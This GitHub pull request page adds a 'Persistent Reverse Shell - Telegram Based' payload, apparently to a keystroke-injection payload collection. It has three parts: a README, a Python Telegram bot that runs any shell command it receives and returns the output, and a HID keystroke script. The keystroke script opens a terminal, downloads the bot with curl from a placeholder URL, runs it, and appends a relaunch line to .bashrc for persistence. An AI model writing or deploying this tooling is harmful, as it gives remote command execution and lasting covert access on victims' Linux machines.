Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Persistent Reverse Shell - Telegram Based #654

Open
wants to merge 3 commits into
base: master
Choose a base branch
from
Open
Show file tree
Hide file tree
Changes from all commits
Commits
File filter

Filter by extension

Filter by extension

Conversations
Failed to load comments.
Loading
Jump to
Jump to file
Failed to load files.
Loading
Diff view
Diff view
Original file line number Diff line number Diff line change
@@ -0,0 +1,41 @@
# Persistent Reverse Shell - Telegram Based

A script used to configure a persistent reverse shell on a Linux computer trough a pre-configured Telegram Bot.

**Category**: Execution

## Dependencies

* Internet Connection

## Description

A script used to configure a persistent reverse shell on a Linux computer trough a pre-configured Telegram Bot.

This payload is based on [Telegram Persistent Connection](Telegram_Persistent_Connection) payload for create the Telegram connection.

The script accept the `/reverse` command using the format `/reverse <shell_command>` and split `/reverse` from `<shell_command>` trough the `extract_command()` function, then execute the command acquired acquiring the output trough the function `run_command()`.

Because Telegram uses a limited size per message, the script divides the output of the command into a theoretically infinite chunk of 1000 characters in length that will be sent one by one through the Telegram Bot.

## Credits

<h2 align="center">Aleff</h2>
<div align=center>
<table>
<tr>
<td align="center" width="96">
<a href="https://github.com/aleff-github">
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/github.png?raw=true width="48" height="48" />
</a>
<br>Github
</td>
<td align="center" width="96">
<a href="https://www.linkedin.com/in/alessandro-greco-aka-aleff/">
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/linkedin.png?raw=true width="48" height="48" />
</a>
<br>Linkedin
</td>
</tr>
</table>
</div>
Original file line number Diff line number Diff line change
@@ -0,0 +1,43 @@
from telebot import TeleBot, types
import subprocess

# Set here the Telegram bot token
BOT_TOKEN = ""
bot = TeleBot(BOT_TOKEN)

commands = [
types.BotCommand("/reverse", "/reverse <shell_command>")
]

bot.set_my_commands(commands=commands)

@bot.message_handler(commands=['reverse'])
def reverse_shell(message):
command = extract_command(message.text)
if command != "":
print(f"Command received: {command}")
out = run_command(command)
if len(out) > 1000:
bot.reply_to(message, "Message too long...")
chunk_size = 1000
for i in range(0, len(out), chunk_size):
bot.send_message(message.chat.id, out[i:i+chunk_size])
else:
bot.reply_to(message, out)

def extract_command(message):
command_prefix = "/reverse"
if message.startswith(command_prefix):
return message[len(command_prefix):].strip()
else:
return None

def run_command(command):
try:
result = subprocess.check_output(command, shell=True, text=True)
return result.strip()
except subprocess.CalledProcessError as e:
return f"Some error: {e}"


bot.infinity_polling()
Original file line number Diff line number Diff line change
@@ -0,0 +1,32 @@
* REM ############################################################
* REM # #
* REM # Title : Persistent Reverse Shell - Telegram Based #
* REM # Author : Aleff #
* REM # Version : 1.0 #
* REM # Category : Execution #
* REM # Target : Linux #
* REM # #
* REM ############################################################

ATTACKMODE HID

* REM Requirements:
* REM - Internet Connection

QUACK REM VARIABLES
* REM 1) Here you must put your own file link.
PYTHON-SCRIPT-LINK='https://www.example.com/connection.py'

QUACK DELAY 1000
QUACK CTRL-ALT t
QUACK DELAY 2000

QUACK STRING curl -o connection.py $PYTHON-SCRIPT-LINK; python3 connection.py; echo \"if ! pgrep -f connection.py >/dev/null; then
QUACK ENTER

QUACK STRING python3 connection.py &
QUACK ENTER

QUACK STRING fi\" >> .bashrc; exit
QUACK ENTER